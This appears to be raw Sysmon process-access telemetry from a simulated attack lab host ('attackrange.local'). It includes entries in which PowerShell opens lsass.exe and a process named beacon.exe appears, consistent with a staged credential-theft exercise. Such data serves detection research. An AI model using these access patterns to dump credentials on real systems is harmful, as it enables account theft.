16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 